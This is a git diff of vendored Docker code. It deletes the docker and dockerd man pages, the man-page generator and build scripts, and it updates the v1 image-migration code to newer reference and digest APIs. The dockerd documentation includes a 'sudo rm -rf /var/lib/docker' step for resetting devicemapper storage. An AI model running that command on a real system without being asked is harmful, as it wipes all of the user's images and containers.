the **run** command. - -**save** - Save an image to a tar archive - See **docker-save(1)** for full documentation on the **save** command. - -**search** - Search for an image in the Docker index - See **docker-search(1)** for full documentation on the **search** command. - -**start** - Start a container - See **docker-start(1)** for full documentation on the **start** command. - -**stats** - Display a live stream of one or more containers' resource usage statistics - See **docker-stats(1)** for full documentation on the **stats** command. - -**stop** - Stop a container - See **docker-stop(1)** for full documentation on the **stop** command. - -**tag** - Tag an image into a repository - See **docker-tag(1)** for full documentation on the **tag** command. - -**top** - Lookup the running processes of a container - See **docker-top(1)** for full documentation on the **top** command. - -**unpause** - Unpause all processes within a container - See **docker-unpause(1)** for full documentation on the **unpause** command. - -**version** - Show the Docker version information - See **docker-version(1)** for full documentation on the **version** command. - -**wait** - Block until a container stops, then print its exit code - See **docker-wait(1)** for full documentation on the **wait** command. - - -# RUNTIME EXECUTION OPTIONS - -Use the **--exec-opt** flags to specify options to the execution driver. -The following options are available: - -#### native.cgroupdriver -Specifies the management of the container's `cgroups`. You can specify `cgroupfs` -or `systemd`. If you specify `systemd` and it is not available, the system errors -out. - -#### Client -For specific client examples please see the man page for the specific Docker -command. For example: - - man docker-run - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) based on docker.com source material and internal work. diff --git a/vendor/github.com/docker/docker/man/dockerd.8.md b/vendor/github.com/docker/docker/man/dockerd.8.md deleted file mode 100644 index 761dc6b9be..0000000000 --- a/vendor/github.com/docker/docker/man/dockerd.8.md +++ /dev/null @@ -1,710 +0,0 @@ -% DOCKER(8) Docker User Manuals -% Shishir Mahajan -% SEPTEMBER 2015 -# NAME -dockerd - Enable daemon mode - -# SYNOPSIS -**dockerd** -[**--add-runtime**[=*[]*]] -[**--api-cors-header**=[=*API-CORS-HEADER*]] -[**--authorization-plugin**[=*[]*]] -[**-b**|**--bridge**[=*BRIDGE*]] -[**--bip**[=*BIP*]] -[**--cgroup-parent**[=*[]*]] -[**--cluster-store**[=*[]*]] -[**--cluster-advertise**[=*[]*]] -[**--cluster-store-opt**[=*map[]*]] -[**--config-file**[=*/etc/docker/daemon.json*]] -[**--containerd**[=*SOCKET-PATH*]] -[**-D**|**--debug**] -[**--default-gateway**[=*DEFAULT-GATEWAY*]] -[**--default-gateway-v6**[=*DEFAULT-GATEWAY-V6*]] -[**--default-runtime**[=*runc*]] -[**--default-ulimit**[=*[]*]] -[**--disable-legacy-registry**] -[**--dns**[=*[]*]] -[**--dns-opt**[=*[]*]] -[**--dns-search**[=*[]*]] -[**--exec-opt**[=*[]*]] -[**--exec-root**[=*/var/run/docker*]] -[**--experimental**[=*false*]] -[**--fixed-cidr**[=*FIXED-CIDR*]] -[**--fixed-cidr-v6**[=*FIXED-CIDR-V6*]] -[**-G**|**--group**[=*docker*]] -[**-g**|**--graph**[=*/var/lib/docker*]] -[**-H**|**--host**[=*[]*]] -[**--help**] -[**--icc**[=*true*]] -[**--init**[=*false*]] -[**--init-path**[=*""*]] -[**--insecure-registry**[=*[]*]] -[**--ip**[=*0.0.0.0*]] -[**--ip-forward**[=*true*]] -[**--ip-masq**[=*true*]] -[**--iptables**[=*true*]] -[**--ipv6**] -[**--isolation**[=*default*]] -[**-l**|**--log-level**[=*info*]] -[**--label**[=*[]*]] -[**--live-restore**[=*false*]] -[**--log-driver**[=*json-file*]] -[**--log-opt**[=*map[]*]] -[**--mtu**[=*0*]] -[**--max-concurrent-downloads**[=*3*]] -[**--max-concurrent-uploads**[=*5*]] -[**-p**|**--pidfile**[=*/var/run/docker.pid*]] -[**--raw-logs**] -[**--registry-mirror**[=*[]*]] -[**-s**|**--storage-driver**[=*STORAGE-DRIVER*]] -[**--seccomp-profile**[=*SECCOMP-PROFILE-PATH*]] -[**--selinux-enabled**] -[**--shutdown-timeout**[=*15*]] -[**--storage-opt**[=*[]*]] -[**--swarm-default-advertise-addr**[=*IP|INTERFACE*]] -[**--tls**] -[**--tlscacert**[=*~/.docker/ca.pem*]] -[**--tlscert**[=*~/.docker/cert.pem*]] -[**--tlskey**[=*~/.docker/key.pem*]] -[**--tlsverify**] -[**--userland-proxy**[=*true*]] -[**--userland-proxy-path**[=*""*]] -[**--userns-remap**[=*default*]] - -# DESCRIPTION -**dockerd** is used for starting the Docker daemon (i.e., to command the daemon -to manage images, containers etc). So **dockerd** is a server, as a daemon. - -To run the Docker daemon you can specify **dockerd**. -You can check the daemon options using **dockerd --help**. -Daemon options should be specified after the **dockerd** keyword in the -following format. - -**dockerd [OPTIONS]** - -# OPTIONS - -**--add-runtime**=[] - Runtimes can be registered with the daemon either via the -configuration file or using the `--add-runtime` command line argument. - - The following is an example adding 2 runtimes via the configuration: - -```json -{ - "default-runtime": "runc", - "runtimes": { - "runc": { - "path": "runc" - }, - "custom": { - "path": "/usr/local/bin/my-runc-replacement", - "runtimeArgs": [ - "--debug" - ] - } - } -} -``` - - This is the same example via the command line: - -```bash -$ sudo dockerd --add-runtime runc=runc --add-runtime custom=/usr/local/bin/my-runc-replacement -``` - - **Note**: defining runtime arguments via the command line is not supported. - -**--api-cors-header**="" - Set CORS headers in the Engine API. Default is cors disabled. Give urls like - "http://foo, http://bar, ...". Give "*" to allow all. - -**--authorization-plugin**="" - Set authorization plugins to load - -**-b**, **--bridge**="" - Attach containers to a pre\-existing network bridge; use 'none' to disable - container networking - -**--bip**="" - Use the provided CIDR notation address for the dynamically created bridge - (docker0); Mutually exclusive of \-b - -**--cgroup-parent**="" - Set parent cgroup for all containers. Default is "/docker" for fs cgroup - driver and "system.slice" for systemd cgroup driver. - -**--cluster-store**="" - URL of the distributed storage backend - -**--cluster-advertise**="" - Specifies the 'host:port' or `interface:port` combination that this - particular daemon instance should use when advertising itself to the cluster. - The daemon is reached through this value. - -**--cluster-store-opt**="" - Specifies options for the Key/Value store. - -**--config-file**="/etc/docker/daemon.json" - Specifies the JSON file path to load the configuration from. - -**--containerd**="" - Path to containerd socket. - -**-D**, **--debug**=*true*|*false* - Enable debug mode. Default is false. - -**--default-gateway**="" - IPv4 address of the container default gateway; this address must be part of - the bridge subnet (which is defined by \-b or \--bip) - -**--default-gateway-v6**="" - IPv6 address of the container default gateway - -**--default-runtime**="runc" - Set default runtime if there're more than one specified by `--add-runtime`. - -**--default-ulimit**=[] - Default ulimits for containers. - -**--disable-legacy-registry**=*true*|*false* - Disable contacting legacy registries - -**--dns**="" - Force Docker to use specific DNS servers - -**--dns-opt**="" - DNS options to use. - -**--dns-search**=[] - DNS search domains to use. - -**--exec-opt**=[] - Set runtime execution options. See RUNTIME EXECUTION OPTIONS. - -**--exec-root**="" - Path to use as the root of the Docker execution state files. Default is - `/var/run/docker`. - -**--experimental**="" - Enable the daemon experimental features. - -**--fixed-cidr**="" - IPv4 subnet for fixed IPs (e.g., 10.20.0.0/16); this subnet must be nested in - the bridge subnet (which is defined by \-b or \-\-bip). - -**--fixed-cidr-v6**="" - IPv6 subnet for global IPv6 addresses (e.g., 2a00:1450::/64) - -**-G**, **--group**="" - Group to assign the unix socket specified by -H when running in daemon mode. - use '' (the empty string) to disable setting of a group. Default is `docker`. - -**-g**, **--graph**="" - Path to use as the root of the Docker runtime. Default is `/var/lib/docker`. - -**-H**, **--host**=[*unix:///var/run/docker.sock*]: tcp://[host:port] to bind or -unix://[/path/to/socket] to use. - The socket(s) to bind to in daemon mode specified using one or more - tcp://host:port, unix:///path/to/socket, fd://* or fd://socketfd. - -**--help** - Print usage statement - -**--icc**=*true*|*false* - Allow unrestricted inter\-container and Docker daemon host communication. If - disabled, containers can still be linked together using the **--link** option - (see **docker-run(1)**). Default is true. - -**--init** - Run an init process inside containers for signal forwarding and process - reaping. - -**--init-path** - Path to the docker-init binary. - -**--insecure-registry**=[] - Enable insecure registry communication, i.e., enable un-encrypted and/or - untrusted communication. - - List of insecure registries can contain an element with CIDR notation to - specify a whole subnet. Insecure registries accept HTTP and/or accept HTTPS - with certificates from unknown CAs. - - Enabling `--insecure-registry` is useful when running a local registry. - However, because its use creates security vulnerabilities it should ONLY be - enabled for testing purposes. For increased security, users should add their - CA to their system's list of trusted CAs instead of using - `--insecure-registry`. - -**--ip**="" - Default IP address to use when binding container ports. Default is `0.0.0.0`. - -**--ip-forward**=*true*|*false* - Enables IP forwarding on the Docker host. The default is `true`. This flag - interacts with the IP forwarding setting on your host system's kernel. If - your system has IP forwarding disabled, this setting enables it. If your - system has IP forwarding enabled, setting this flag to `--ip-forward=false` - has no effect. - - This setting will also enable IPv6 forwarding if you have both - `--ip-forward=true` and `--fixed-cidr-v6` set. Note that this may reject - Router Advertisements and interfere with the host's existing IPv6 - configuration. For more information, please consult the documentation about - "Advanced Networking - IPv6". - -**--ip-masq**=*true*|*false* - Enable IP masquerading for bridge's IP range. Default is true. - -**--iptables**=*true*|*false* - Enable Docker's addition of iptables rules. Default is true. - -**--ipv6**=*true*|*false* - Enable IPv6 support. Default is false. Docker will create an IPv6-enabled - bridge with address fe80::1 which will allow you to create IPv6-enabled - containers. Use together with `--fixed-cidr-v6` to provide globally routable - IPv6 addresses. IPv6 forwarding will be enabled if not used with - `--ip-forward=false`. This may collide with your host's current IPv6 - settings. For more information please consult the documentation about - "Advanced Networking - IPv6". - -**--isolation**="*default*" - Isolation specifies the type of isolation technology used by containers. - Note that the default on Windows server is `process`, and the default on - Windows client is `hyperv`. Linux only supports `default`. - -**-l**, **--log-level**="*debug*|*info*|*warn*|*error*|*fatal*" - Set the logging level. Default is `info`. - -**--label**="[]" - Set key=value labels to the daemon (displayed in `docker info`) - -**--live-restore**=*false* - Enable live restore of running containers when the daemon starts so that they - are not restarted. This option is applicable only for docker daemon running - on Linux host. - -**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*" - Default driver for container logs. Default is `json-file`. - **Warning**: `docker logs` command works only for `json-file` logging driver. - -**--log-opt**=[] - Logging driver specific options. - -**--mtu**=*0* - Set the containers network mtu. Default is `0`. - -**--max-concurrent-downloads**=*3* - Set the max concurrent downloads for each pull. Default is `3`. - -**--max-concurrent-uploads**=*5* - Set the max concurrent uploads for each push. Default is `5`. - -**-p**, **--pidfile**="" - Path to use for daemon PID file. Default is `/var/run/docker.pid` - -**--raw-logs** - Output daemon logs in full timestamp format without ANSI coloring. If this - flag is not set, the daemon outputs condensed, colorized logs if a terminal - is detected, or full ("raw") output otherwise. - -**--registry-mirror**=*://* - Prepend a registry mirror to be used for image pulls. May be specified - multiple times. - -**-s**, **--storage-driver**="" - Force the Docker runtime to use a specific storage driver. - -**--seccomp-profile**="" - Path to seccomp profile. - -**--selinux-enabled**=*true*|*false* - Enable selinux support. Default is false. - -**--shutdown-timeout**=*15* - Set the shutdown timeout value in seconds. Default is `15`. - -**--storage-opt**=[] - Set storage driver options. See STORAGE DRIVER OPTIONS. - -**--swarm-default-advertise-addr**=*IP|INTERFACE* - Set default address or interface for swarm to advertise as its - externally-reachable address to other cluster members. This can be a - hostname, an IP address, or an interface such as `eth0`. A port cannot be - specified with this option. - -**--tls**=*true*|*false* - Use TLS; implied by --tlsverify. Default is false. - -**--tlscacert**=*~/.docker/ca.pem* - Trust certs signed only by this CA. - -**--tlscert**=*~/.docker/cert.pem* - Path to TLS certificate file. - -**--tlskey**=*~/.docker/key.pem* - Path to TLS key file. - -**--tlsverify**=*true*|*false* - Use TLS and verify the remote (daemon: verify client, client: verify daemon). - Default is false. - -**--userland-proxy**=*true*|*false* - Rely on a userland proxy implementation for inter-container and - outside-to-container loopback communications. Default is true. - -**--userland-proxy-path**="" - Path to the userland proxy binary. - -**--userns-remap**=*default*|*uid:gid*|*user:group*|*user*|*uid* - Enable user namespaces for containers on the daemon. Specifying "default" - will cause a new user and group to be created to handle UID and GID range - remapping for the user namespace mappings used for contained processes. - Specifying a user (or uid) and optionally a group (or gid) will cause the - daemon to lookup the user and group's subordinate ID ranges for use as the - user namespace mappings for contained processes. - -# STORAGE DRIVER OPTIONS - -Docker uses storage backends (known as "graphdrivers" in the Docker -internals) to create writable containers from images. Many of these -backends use operating system level technologies and can be -configured. - -Specify options to the storage backend with **--storage-opt** flags. The -backends that currently take options are *devicemapper*, *zfs* and *btrfs*. -Options for *devicemapper* are prefixed with *dm*, options for *zfs* -start with *zfs* and options for *btrfs* start with *btrfs*. - -Specifically for devicemapper, the default is a "loopback" model which -requires no pre-configuration, but is extremely inefficient. Do not -use it in production. - -To make the best use of Docker with the devicemapper backend, you must -have a recent version of LVM. Use `lvm` to create a thin pool; for -more information see `man lvmthin`. Then, use `--storage-opt -dm.thinpooldev` to tell the Docker engine to use that pool for -allocating images and container snapshots. - -## Devicemapper options - -#### dm.thinpooldev - -Specifies a custom block storage device to use for the thin pool. - -If using a block device for device mapper storage, it is best to use `lvm` -to create and manage the thin-pool volume. This volume is then handed to Docker -to exclusively create snapshot volumes needed for images and containers. - -Managing the thin-pool outside of Engine makes for the most feature-rich -method of having Docker utilize device mapper thin provisioning as the -backing storage for Docker containers. The highlights of the lvm-based -thin-pool management feature include: automatic or interactive thin-pool -resize support, dynamically changing thin-pool features, automatic thinp -metadata checking when lvm activates the thin-pool, etc. - -As a fallback if no thin pool is provided, loopback files are -created. Loopback is very slow, but can be used without any -pre-configuration of storage. It is strongly recommended that you do -not use loopback in production. Ensure your Engine daemon has a -`--storage-opt dm.thinpooldev` argument provided. - -Example use: - - $ dockerd \ - --storage-opt dm.thinpooldev=/dev/mapper/thin-pool - -#### dm.basesize - -Specifies the size to use when creating the base device, which limits -the size of images and containers. The default value is 10G. Note, -thin devices are inherently "sparse", so a 10G device which is mostly -empty doesn't use 10 GB of space on the pool. However, the filesystem -will use more space for base images the larger the device -is. - -The base device size can be increased at daemon restart which will allow -all future images and containers (based on those new images) to be of the -new base device size. - -Example use: `dockerd --storage-opt dm.basesize=50G` - -This will increase the base device size to 50G. The Docker daemon will throw an -error if existing base device size is larger than 50G. A user can use -this option to expand the base device size however shrinking is not permitted. - -This value affects the system-wide "base" empty filesystem that may already -be initialized and inherited by pulled images. Typically, a change to this -value requires additional steps to take effect: - - $ sudo service docker stop - $ sudo rm -rf /var/lib/docker - $ sudo service docker start - -Example use: `dockerd --storage-opt dm.basesize=20G` - -#### dm.fs - -Specifies the filesystem type to use for the base device. The -supported options are `ext4` and `xfs`. The default is `ext4`. - -Example use: `dockerd --storage-opt dm.fs=xfs` - -#### dm.mkfsarg - -Specifies extra mkfs arguments to be used when creating the base device. - -Example use: `dockerd --storage-opt "dm.mkfsarg=-O ^has_journal"` - -#### dm.mountopt - -Specifies extra mount options used when mounting the thin devices. - -Example use: `dockerd --storage-opt dm.mountopt=nodiscard` - -#### dm.use_deferred_removal - -Enables use of deferred device removal if `libdm` and the kernel driver -support the mechanism. - -Deferred device removal means that if device is busy when devices are -being removed/deactivated, then a deferred removal is scheduled on -device. And devices automatically go away when last user of the device -exits. - -For example, when a container exits, its associated thin device is removed. If -that device has leaked into some other mount namespace and can't be removed, -the container exit still succeeds and this option causes the system to schedule -the device for deferred removal. It does not wait in a loop trying to remove a -busy device. - -Example use: `dockerd --storage-opt dm.use_deferred_removal=true` - -#### dm.use_deferred_deletion - -Enables use of deferred device deletion for thin pool devices. By default, -thin pool device deletion is synchronous. Before a container is deleted, the -Docker daemon removes any associated devices. If the storage driver can not -remove a device, the container deletion fails and daemon returns. - -`Error deleting container: Error response from daemon: Cannot destroy container` - -To avoid this failure, enable both deferred device deletion and deferred -device removal on the daemon. - -`dockerd --storage-opt dm.use_deferred_deletion=true --storage-opt dm.use_deferred_removal=true` - -With these two options enabled, if a device is busy when the driver is -deleting a container, the driver marks the device as deleted. Later, when the -device isn't in use, the driver deletes it. - -In general it should be safe to enable this option by default. It will help -when unintentional leaking of mount point happens across multiple mount -namespaces. - -#### dm.loopdatasize - -**Note**: This option configures devicemapper loopback, which should not be -used in production. - -Specifies the size to use when creating the loopback file for the "data" device -which is used for the thin pool. The default size is 100G. The file is sparse, -so it will not initially take up this much space. - -Example use: `dockerd --storage-opt dm.loopdatasize=200G` - -#### dm.loopmetadatasize - -**Note**: This option configures devicemapper loopback, which should not be -used in production. - -Specifies the size to use when creating the loopback file for the "metadata" -device which is used for the thin pool. The default size is 2G. The file is -sparse, so it will not initially take up this much space. - -Example use: `dockerd --storage-opt dm.loopmetadatasize=4G` - -#### dm.datadev - -(Deprecated, use `dm.thinpooldev`) - -Specifies a custom blockdevice to use for data for a Docker-managed thin pool. -It is better to use `dm.thinpooldev` - see the documentation for it above for -discussion of the advantages. - -#### dm.metadatadev - -(Deprecated, use `dm.thinpooldev`) - -Specifies a custom blockdevice to use for metadata for a Docker-managed thin -pool. See `dm.datadev` for why this is deprecated. - -#### dm.blocksize - -Specifies a custom blocksize to use for the thin pool. The default -blocksize is 64K. - -Example use: `dockerd --storage-opt dm.blocksize=512K` - -#### dm.blkdiscard - -Enables or disables the use of `blkdiscard` when removing devicemapper devices. -This is disabled by default due to the additional latency, but as a special -case with loopback devices it will be enabled, in order to re-sparsify the -loopback file on image/container removal. - -Disabling this on loopback can lead to *much* faster container removal times, -but it also prevents the space used in `/var/lib/docker` directory from being -returned to the system for other use when containers are removed. - -Example use: `dockerd --storage-opt dm.blkdiscard=false` - -#### dm.override_udev_sync_check - -By default, the devicemapper backend attempts to synchronize with the `udev` -device manager for the Linux kernel. This option allows disabling that -synchronization, to continue even though the configuration may be buggy. - -To view the `udev` sync support of a Docker daemon that is using the -`devicemapper` driver, run: - - $ docker info - [...] - Udev Sync Supported: true - [...] - -When `udev` sync support is `true`, then `devicemapper` and `udev` can -coordinate the activation and deactivation of devices for containers. - -When `udev` sync support is `false`, a race condition occurs between the -`devicemapper` and `udev` during create and cleanup. The race condition results -in errors and failures. (For information on these failures, see -[docker#4036](https://github.com/docker/docker/issues/4036)) - -To allow the `docker` daemon to start, regardless of whether `udev` sync is -`false`, set `dm.override_udev_sync_check` to true: - - $ dockerd --storage-opt dm.override_udev_sync_check=true - -When this value is `true`, the driver continues and simply warns you the errors -are happening. - -**Note**: The ideal is to pursue a `docker` daemon and environment that does -support synchronizing with `udev`. For further discussion on this topic, see -[docker#4036](https://github.com/docker/docker/issues/4036). -Otherwise, set this flag for migrating existing Docker daemons to a daemon with -a supported environment. - -#### dm.min_free_space - -Specifies the min free space percent in a thin pool require for new device -creation to succeed. This check applies to both free data space as well -as free metadata space. Valid values are from 0% - 99%. Value 0% disables -free space checking logic. If user does not specify a value for this option, -the Engine uses a default value of 10%. - -Whenever a new a thin pool device is created (during `docker pull` or during -container creation), the Engine checks if the minimum free space is available. -If the space is unavailable, then device creation fails and any relevant -`docker` operation fails. - -To recover from this error, you must create more free space in the thin pool to -recover from the error. You can create free space by deleting some images and -containers from tge thin pool. You can also add more storage to the thin pool. - -To add more space to an LVM (logical volume management) thin pool, just add -more storage to the group container thin pool; this should automatically -resolve any errors. If your configuration uses loop devices, then stop the -Engine daemon, grow the size of loop files and restart the daemon to resolve -the issue. - -Example use:: `dockerd --storage-opt dm.min_free_space=10%` - -#### dm.xfs_nospace_max_retries - -Specifies the maximum number of retries XFS should attempt to complete IO when -ENOSPC (no space) error is returned by underlying storage device. - -By default XFS retries infinitely for IO to finish and this can result in -unkillable process. To change this behavior one can set xfs_nospace_max_retries -to say 0 and XFS will not retry IO after getting ENOSPC and will shutdown -filesystem. - -Example use: - - $ sudo dockerd --storage-opt dm.xfs_nospace_max_retries=0 - - -## ZFS options - -#### zfs.fsname - -Set zfs filesystem under which docker will create its own datasets. By default -docker will pick up the zfs filesystem where docker graph (`/var/lib/docker`) -is located. - -Example use: `dockerd -s zfs --storage-opt zfs.fsname=zroot/docker` - -## Btrfs options - -#### btrfs.min_space - -Specifies the mininum size to use when creating the subvolume which is used for -containers. If user uses disk quota for btrfs when creating or running a -container with **--storage-opt size** option, docker should ensure the **size** -cannot be smaller than **btrfs.min_space**. - -Example use: `docker daemon -s btrfs --storage-opt btrfs.min_space=10G` - -# CLUSTER STORE OPTIONS - -The daemon uses libkv to advertise the node within the cluster. Some Key/Value -backends support mutual TLS, and the client TLS settings used by the daemon can -be configured using the **--cluster-store-opt** flag, specifying the paths to -PEM encoded files. - -#### kv.cacertfile - -Specifies the path to a local file with PEM encoded CA certificates to trust - -#### kv.certfile - -Specifies the path to a local file with a PEM encoded certificate. This -certificate is used as the client cert for communication with the Key/Value -store. - -#### kv.keyfile - -Specifies the path to a local file with a PEM encoded private key. This -private key is used as the client key for communication with the Key/Value -store. - -# Access authorization - -Docker's access authorization can be extended by authorization plugins that -your organization can purchase or build themselves. You can install one or more -authorization plugins when you start the Docker `daemon` using the -`--authorization-plugin=PLUGIN_ID` option. - -```bash -dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,... -``` - -The `PLUGIN_ID` value is either the plugin's name or a path to its -specification file. The plugin's implementation determines whether you can -specify a name or path. Consult with your Docker administrator to get -information about the plugins available to you. - -Once a plugin is installed, requests made to the `daemon` through the command -line or Docker's Engine API are allowed or denied by the plugin. If you have -multiple plugins installed, at least one must allow the request for it to -complete. - -For information about how to create an authorization plugin, see [authorization -plugin](https://docs.docker.com/engine/extend/authorization/) section in the -Docker extend section of this documentation. - - -# HISTORY -Sept 2015, Originally compiled by Shishir Mahajan -based on docker.com source material and internal work. diff --git a/vendor/github.com/docker/docker/man/generate.go b/vendor/github.com/docker/docker/man/generate.go deleted file mode 100644 index f21614d94a..0000000000 --- a/vendor/github.com/docker/docker/man/generate.go +++ /dev/null @@ -1,43 +0,0 @@ -package main - -import ( - "fmt" - "os" - - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/commands" - "github.com/docker/docker/pkg/term" - "github.com/spf13/cobra" - "github.com/spf13/cobra/doc" -) - -func generateManPages(path string) error { - header := &doc.GenManHeader{ - Title: "DOCKER", - Section: "1", - Source: "Docker Community", - } - - stdin, stdout, stderr := term.StdStreams() - dockerCli := command.NewDockerCli(stdin, stdout, stderr) - cmd := &cobra.Command{Use: "docker"} - commands.AddCommands(cmd, dockerCli) - - cmd.DisableAutoGenTag = true - return doc.GenManTreeFromOpts(cmd, doc.GenManTreeOptions{ - Header: header, - Path: path, - CommandSeparator: "-", - }) -} - -func main() { - path := "/tmp" - if len(os.Args) > 1 { - path = os.Args[1] - } - fmt.Printf("Generating man pages into %s\n", path) - if err := generateManPages(path); err != nil { - fmt.Fprintf(os.Stderr, "Failed to generate man pages: %s\n", err.Error()) - } -} diff --git a/vendor/github.com/docker/docker/man/generate.sh b/vendor/github.com/docker/docker/man/generate.sh deleted file mode 100755 index e4126ba4ac..0000000000 --- a/vendor/github.com/docker/docker/man/generate.sh +++ /dev/null @@ -1,15 +0,0 @@ -#!/bin/bash -# -# Generate man pages for docker/docker -# - -set -eu - -mkdir -p ./man/man1 - -# Generate man pages from cobra commands -go build -o /tmp/gen-manpages ./man -/tmp/gen-manpages ./man/man1 - -# Generate legacy pages from markdown -./man/md2man-all.sh -q diff --git a/vendor/github.com/docker/docker/man/glide.lock b/vendor/github.com/docker/docker/man/glide.lock deleted file mode 100644 index 5ec765a4c6..0000000000 --- a/vendor/github.com/docker/docker/man/glide.lock +++ /dev/null @@ -1,52 +0,0 @@ -hash: ead3ea293a6143fe41069ebec814bf197d8c43a92cc7666b1f7e21a419b46feb -updated: 2016-06-20T21:53:35.420817456Z -imports: -- name: github.com/BurntSushi/toml - version: f0aeabca5a127c4078abb8c8d64298b147264b55 -- name: github.com/cpuguy83/go-md2man - version: a65d4d2de4d5f7c74868dfa9b202a3c8be315aaa - subpackages: - - md2man -- name: github.com/fsnotify/fsnotify - version: 30411dbcefb7a1da7e84f75530ad3abe4011b4f8 -- name: github.com/hashicorp/hcl - version: da486364306ed66c218be9b7953e19173447c18b - subpackages: - - hcl/ast - - hcl/parser - - hcl/token - - json/parser - - hcl/scanner - - hcl/strconv - - json/scanner - - json/token -- name: github.com/inconshreveable/mousetrap - version: 76626ae9c91c4f2a10f34cad8ce83ea42c93bb75 -- name: github.com/magiconair/properties - version: c265cfa48dda6474e208715ca93e987829f572f8 -- name: github.com/mitchellh/mapstructure - version: d2dd0262208475919e1a362f675cfc0e7c10e905 -- name: github.com/russross/blackfriday - version: 1d6b8e9301e720b08a8938b8c25c018285885438 -- name: github.com/shurcooL/sanitized_anchor_name - version: 10ef21a441db47d8b13ebcc5fd2310f636973c77 -- name: github.com/spf13/cast - version: 27b586b42e29bec072fe7379259cc719e1289da6 -- name: github.com/spf13/jwalterweatherman - version: 33c24e77fb80341fe7130ee7c594256ff08ccc46 -- name: github.com/spf13/pflag - version: dabebe21bf790f782ea4c7bbd2efc430de182afd -- name: github.com/spf13/viper - version: c1ccc378a054ea8d4e38d8c67f6938d4760b53dd -- name: golang.org/x/sys - version: 62bee037599929a6e9146f29d10dd5208c43507d - subpackages: - - unix -- name: gopkg.in/yaml.v2 - version: a83829b6f1293c91addabc89d0571c246397bbf4 -- name: github.com/spf13/cobra - repo: https://github.com/dnephin/cobra - subpackages: - - doc - version: v1.3 -devImports: [] diff --git a/vendor/github.com/docker/docker/man/glide.yaml b/vendor/github.com/docker/docker/man/glide.yaml deleted file mode 100644 index e99b2670d8..0000000000 --- a/vendor/github.com/docker/docker/man/glide.yaml +++ /dev/null @@ -1,12 +0,0 @@ -package: github.com/docker/docker/man -import: -- package: github.com/cpuguy83/go-md2man - subpackages: - - md2man -- package: github.com/inconshreveable/mousetrap -- package: github.com/spf13/pflag -- package: github.com/spf13/viper -- package: github.com/spf13/cobra - repo: https://github.com/dnephin/cobra - subpackages: - - doc diff --git a/vendor/github.com/docker/docker/man/md2man-all.sh b/vendor/github.com/docker/docker/man/md2man-all.sh deleted file mode 100755 index 97c65c93bc..0000000000 --- a/vendor/github.com/docker/docker/man/md2man-all.sh +++ /dev/null @@ -1,22 +0,0 @@ -#!/bin/bash -set -e - -# get into this script's directory -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -[ "$1" = '-q' ] || { - set -x - pwd -} - -for FILE in *.md; do - base="$(basename "$FILE")" - name="${base%.md}" - num="${name##*.}" - if [ -z "$num" -o "$name" = "$num" ]; then - # skip files that aren't of the format xxxx.N.md (like README.md) - continue - fi - mkdir -p "./man${num}" - go-md2man -in "$FILE" -out "./man${num}/${name}" -done diff --git a/vendor/github.com/docker/docker/migrate/v1/migratev1.go b/vendor/github.com/docker/docker/migrate/v1/migratev1.go index bc42dd2ca4..9cd759a3b8 100644 --- a/vendor/github.com/docker/docker/migrate/v1/migratev1.go +++ b/vendor/github.com/docker/docker/migrate/v1/migratev1.go @@ -1,6 +1,7 @@ -package v1 +package v1 // import "github.com/docker/docker/migrate/v1" import ( + "encoding/json" "errors" "fmt" "io/ioutil" @@ -11,16 +12,15 @@ import ( "sync" "time" - "encoding/json" - - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/image" imagev1 "github.com/docker/docker/image/v1" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/reference" + refstore "github.com/docker/docker/reference" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" ) type graphIDRegistrar interface { @@ -56,7 +56,7 @@ var ( // Migrate takes an old graph directory and transforms the metadata into the // new format. -func Migrate(root, driverName string, ls layer.Store, is image.Store, rs reference.Store, ms metadata.Store) error { +func Migrate(root, driverName string, ls layer.Store, is image.Store, rs refstore.Store, ms metadata.Store) error { graphDir := filepath.Join(root, graphDirName) if _, err := os.Lstat(graphDir); os.IsNotExist(err) { return nil @@ -88,11 +88,7 @@ func Migrate(root, driverName string, ls layer.Store, is image.Store, rs referen return err } - if err := migrateRefs(root, driverName, rs, mappings); err != nil { - return err - } - - return nil + return migrateRefs(root, driverName, rs, mappings) } // CalculateLayerChecksums walks an old graph directory and calculates checksums @@ -195,10 +191,7 @@ func saveMappings(root string, mappings map[string]image.ID) error { return err } defer f.Close() - if err := json.NewEncoder(f).Encode(mappings); err != nil { - return err - } - return nil + return json.NewEncoder(f).Encode(mappings) } func migrateImages(root string, ls graphIDRegistrar, is image.Store, ms metadata.Store, mappings map[string]image.ID) error { @@ -325,19 +318,23 @@ func migrateRefs(root, driverName string, rs refAdder, mappings map[string]image for name, repo := range repos.Repositories { for tag, id := range repo { if strongID, exists := mappings[id]; exists { - ref, err := reference.WithName(name) + ref, err := reference.ParseNormalizedNamed(name) if err != nil { logrus.Errorf("migrate tags: invalid name %q, %q", name, err) continue } - if dgst, err := digest.ParseDigest(tag); err == nil { + if !reference.IsNameOnly(ref) { + logrus.Errorf("migrate tags: invalid name %q, unexpected tag or digest", name) + continue + } + if dgst, err := digest.Parse(tag); err == nil { canonical, err := reference.WithDigest(reference.TrimNamed(ref), dgst) if err != nil { logrus.Errorf("migrate tags: invalid digest %q, %q", dgst, err) continue } if err := rs.AddDigest(canonical, strongID.Digest(), false); err != nil { - logrus.Errorf("can't migrate digest %q for %q, err: %q", ref.String(), strongID, err) + logrus.Errorf("can't migrate digest %q for %q, err: %q", reference.FamiliarString(ref), strongID, err) } } else { tagRef, err := reference.WithTag(ref, tag) @@ -346,7 +343,7 @@ func migrateRefs(root, driverName string, rs refAdder, mappings map[string]image continue } if err := rs.AddTag(tagRef, strongID.Digest(), false); err != nil { - logrus.Errorf("can't migrate tag %q for %q, err: %q", ref.String(), strongID, err) + logrus.Errorf("can't migrate tag %q for %q, err: %q", reference.FamiliarString(ref), strongID, err) } } logrus.Infof("migrated tag %s:%s to point to %s", name, tag, strongID) @@ -428,7 +425,7 @@ func migrateImage(id, root string, ls graphIDRegistrar, is image.Store, ms metad if err != nil { return err } - diffID, err := digest.ParseDigest(string(diffIDData)) + diffID, err := digest.Parse(string(diffIDData)) if err != nil { return err } @@ 